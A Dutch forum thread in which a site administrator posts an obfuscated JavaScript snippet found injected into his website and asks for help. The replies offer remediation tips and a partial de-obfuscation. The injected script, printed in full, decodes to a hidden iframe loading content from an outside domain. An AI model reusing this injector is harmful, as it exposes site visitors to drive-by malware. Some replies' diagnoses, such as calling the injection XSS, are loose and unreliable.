Javascript injecty?

    Beste leden van CP,

    Ik werd net gebeld door mijn baas dat een van de websites niet meer werkte, vervolgens log ik in op de server om te kijken en het eerste wat ik zie is deze code:

    PHP
    <script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="3.5$3.5$51.5$50$15$19$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$19.5$60.5$5.5$3.5$3.5$3.5$51.5$50$56$47.5$53.5$49.5$56$19$19.5$28.5$5.5$3.5$3.5$61.5$15$49.5$53$56.5$49.5$15$60.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$58.5$56$51.5$57$49.5$19$16$29$51.5$50$56$47.5$53.5$49.5$15$56.5$56$48.5$29.5$18.5$51$57$57$55$28$22.5$22.5$49$57.5$48$53$51.5$52.5$47.5$51.5$57$49.5$49$56.5$56$22$48.5$54.5$53.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$49.5$25.5$25$27$49$27.5$27.5$24$24.5$50$27$50$49.5$24$47.5$23$18.5$15$58.5$51.5$49$57$51$29.5$18.5$23.5$23$18.5$15$51$49.5$51.5$50.5$51$57$29.5$18.5$23.5$23$18.5$15$56.5$57$59.5$53$49.5$29.5$18.5$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$28$51$51.5$49$49$49.5$54$28.5$55$54.5$56.5$51.5$57$51.5$54.5$54$28$47.5$48$56.5$54.5$53$57.5$57$49.5$28.5$53$49.5$50$57$28$23$28.5$57$54.5$55$28$23$28.5$18.5$30$29$22.5$51.5$50$56$47.5$53.5$49.5$30$16$19.5$28.5$5.5$3.5$3.5$61.5$5.5$3.5$3.5$50$57.5$54$48.5$57$51.5$54.5$54$15$51.5$50$56$47.5$53.5$49.5$56$19$19.5$60.5$5.5$3.5$3.5$3.5$58$47.5$56$15$50$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$51.5$50$56$47.5$53.5$49.5$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$56.5$56$48.5$18.5$21$18.5$51$57$57$55$28$22.5$22.5$49$57.5$48$53$51.5$52.5$47.5$51.5$57$49.5$49$56.5$56$22$48.5$54.5$53.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$49.5$25.5$25$27$49$27.5$27.5$24$24.5$50$27$50$49.5$24$47.5$23$18.5$19.5$28.5$50$22$56.5$57$59.5$53$49.5$22$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$29.5$18.5$51$51.5$49$49$49.5$54$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$55$54.5$56.5$51.5$57$51.5$54.5$54$29.5$18.5$47.5$48$56.5$54.5$53$57.5$57$49.5$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$53$49.5$50$57$29.5$18.5$23$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$57$54.5$55$29.5$18.5$23$18.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$58.5$51.5$49$57$51$18.5$21$18.5$23.5$23$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$51$49.5$51.5$50.5$51$57$18.5$21$18.5$23.5$23$18.5$19.5$28.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$50$19.5$28.5$5.5$3.5$3.5$61.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-619!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script>

    Kan het zo zijn dat dit een injectie is geweest en zo ja hoe voorkom je het? Ik weet dat er sinds kort een CMS achter draait dat niet door mij is geïnstalleerd en geconfigureerd. Maar ben toch benieuwd waar dit zo ineens vandaan komt.

    Met vriendelijke groet,

    Luc

    Zoek zelf uit of PHP de rechten heeft dat bestand te veranderen. Als dat het geval is kan het CMS (of iets anders) verantwoordelijk zijn.

    Anders ga je wachtwoorden veranderen. Eigenlijk kan het wachtwoord veranderen hoe dan ook geen kwaad.

    miauw!

    Dat noemen ze XSS scripting. Dit kun je voorkomen door alle data die in principe op de pagina wordt weergegeven (of het nou uit de database komt) of via een $_POST altijd met htmlspecialchars of htmlentities gebruiken.

    Nieuwe reactie samengevoegd met originele reactie op 10.05.12 23:14:10:
    Ik heb het script even voor je door geploegd en ben uiteindelijk op de volgende code gekomen:

    Het is een code die malware laad en gebruik maakt van zero days in software zoals Adobe Reader, Flash enzov. ;)

    Wat die code in principe doet is verschillende dingen testen waardoor een error gegenereerd wordt. Hierdoor gaat hij data catchen en gaat hij deze manipuleren en vult hij met die code, doormiddel van het decoden ervan.

    Dan komt de code die ik hierboven heb gepost letterlijk in je source te staan, maar is voor de normale gebruiker onzichtbaar. Dit betekend dat ef iemand heeft toegang tot je website gehad ef iemand heeft een bug misbruikt in de CMS die XSS toestaat.

    EDIT:

    Ben nog even een keertje bezig geweest wat de echte nuttige code is en dat is het volgende:

    PHP
    <script>
st=String;
ss = '';
n="3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,5.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,5.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,5.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,49,57.5,48,53,51.5,52.5,47.5,51.5,57,49.5,49,56.5,56,22,48.5,54.5,53.5,22.5,53.5,47.5,51.5,54,22,55,51,55,30.5,55,47.5,50.5,49.5,29.5,49.5,25.5,25,27,49,27.5,27.5,24,24.5,50,27,50,49.5,24,47.5,23,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,5.5,3.5,3.5,61.5,5.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,5.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,49,57.5,48,53,51.5,52.5,47.5,51.5,57,49.5,49,56.5,56,22,48.5,54.5,53.5,22.5,53.5,47.5,51.5,54,22,55,51,55,30.5,55,47.5,50.5,49.5,29.5,49.5,25.5,25,27,49,27.5,27.5,24,24.5,50,27,50,49.5,24,47.5,23,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,5.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,5.5,3.5,3.5,61.5"["split"]("a,"["substr"](1));
for(i=0; i-619 != 0; i++){
	ss += st.fromCharCode(2*(1+1*n[i]));
}
alert(ss);
</script>

    Kast: HAF922 | CPU: I7-930 @ 4.0GHz | CPU Cooler: Noctua NH-D14 | HDD0: Crucial M4 128GB, HDD1: Kingston SSD 64GB, HDD2/3: WD Black & Green 1TB, HDD4: Seagate 1.5TB | Mem: Kingston HyperX 12GB @ 1600MHz | Graphics: Crossfire HD6970 | Res: 5760x1080

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!

Maak een account aan Login